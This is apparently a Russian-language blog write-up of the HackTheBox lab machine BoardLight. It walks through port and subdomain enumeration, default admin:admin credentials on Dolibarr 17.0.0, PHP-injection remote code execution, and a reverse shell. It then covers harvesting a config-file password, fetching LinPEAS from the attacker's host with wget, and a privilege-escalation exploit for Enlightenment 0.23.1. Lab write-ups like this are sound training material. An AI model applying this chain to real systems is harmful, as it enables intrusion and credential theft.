Найти в Дзене
AUTHORITY
2 подписчика

HTB – [Writeup] BoardLight. Сложность – Easy.

97
2 мин
В этой статье предлагаем Вам рассмотреть writeup рейтинговой машины с площадки "HackTheBox", которая называется BoardLight. Enumeration Первым делом сканируем порты с помощью утилиты nmap. В результате сканирования, мы обнаружили, что открыто 2 порта. Следующим шагом, нам необходимо добавить ip адрес и hostname в /etc/hosts/, после чего мы можем переходить к исследованию доступных ресурсов. Изучаем веб ресурс и обнаруживаем hostname, который и добавим в хосты. Исследование веб-ресурса не дало результатов, однако при перечисление subdomain мы нашли интересный субдомен crm.board.htb, необходимо так же добавить его в наш файл /etc/hosts/. Exploitation Перейдя на crm.board.htb нас встречает dolibarr 17.0.0. Попробуем использовать дефолтные креды admin:admin. Ура, нас пускает в админ панель. Поиск уязвимостей на данную версию привел нас к статье, в которой описывается как добиться rce через внедрение php кода. (ссылка на статью - https://www.swascan.com/security-advisory-dolibarr-17-0-0/
Оглавление

В этой статье предлагаем Вам рассмотреть writeup рейтинговой машины с площадки "HackTheBox", которая называется BoardLight.

Enumeration

-2

Первым делом сканируем порты с помощью утилиты nmap. В результате сканирования, мы обнаружили, что открыто 2 порта. Следующим шагом, нам необходимо добавить ip адрес и hostname в /etc/hosts/, после чего мы можем переходить к исследованию доступных ресурсов.

-3

Изучаем веб ресурс и обнаруживаем hostname, который и добавим в хосты.

-4

Исследование веб-ресурса не дало результатов, однако при перечисление subdomain мы нашли интересный субдомен crm.board.htb, необходимо так же добавить его в наш файл /etc/hosts/.

Exploitation

Перейдя на crm.board.htb нас встречает dolibarr 17.0.0.

-5

Попробуем использовать дефолтные креды admin:admin. Ура, нас пускает в админ панель. Поиск уязвимостей на данную версию привел нас к статье, в которой описывается как добиться rce через внедрение php кода. (ссылка на статью - https://www.swascan.com/security-advisory-dolibarr-17-0-0/)

Создаем веб страницу и внедряем в нее php код из статьи для тестирования

-6

Далее переходим на созданную нами страницу и наблюдаем что код выполняется.

-7

Так как php код у нас выполняется, было принято решение попробовать использовать Php PentestMonkey payload, который можно взять с данного ресурса https://www.revshells.com/.

Включаем прослушиватель на выбранном нами порту и ловим шелл.

-8

Мы получили пользователя с низкими привилегиями www-data. Наша следующая задача проверить какие пользователи находятся в системе и имеют более высокие привилегии.

В директории /home находим пользователя larissa,к папке которого у нас нет доступа. Немного погуглив где располагаются конфигурационные файлы dolibarr, мы находим необходимый файл по пути /html/crm.board.htb/htdocs/conf и получаем пароль.

-9

Проверяем найденный пароль на пользователя larissa и получаем пользователя с более высокими привилегиями, а также наш первый флаг.

Privilege Escalation

Пользователь larissa не имеет файлов которые мы могли бы использовать для повышения привилегий, а также команды sudo –l и find / -perm –u=s 2>/dev/null не принесли результатов.

Загружаем Linpeas на атакуемую машину с нашей, воспользовавшись возможностями языка python.

-10

На атакуемой машине скачиваем файл введя команду wget http://ourIP:PORT/Filename и предоставляем права на исполнение командой chmod +x filename

-11

Просматривая результаты linpeas, обнаруживаем службу Enlightenment и смотрим на ее версию,в нашем случае версия 0.23.1

-12

Первый же запрос в поисковике выдает нам эксплоит на PE.

(ссылки на статьи - https://www.exploit-db.com/exploits/51180, https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main)

Создаем баш скрипт,выдаем ему необходимые права на исполнение и запускаем.

-13

Получаем root флаг.....

-14

А на этом всё!! Спасибо за внимание. Подписывайтесь на наш telegram-канал AUTHORITY. Пишите комментарии.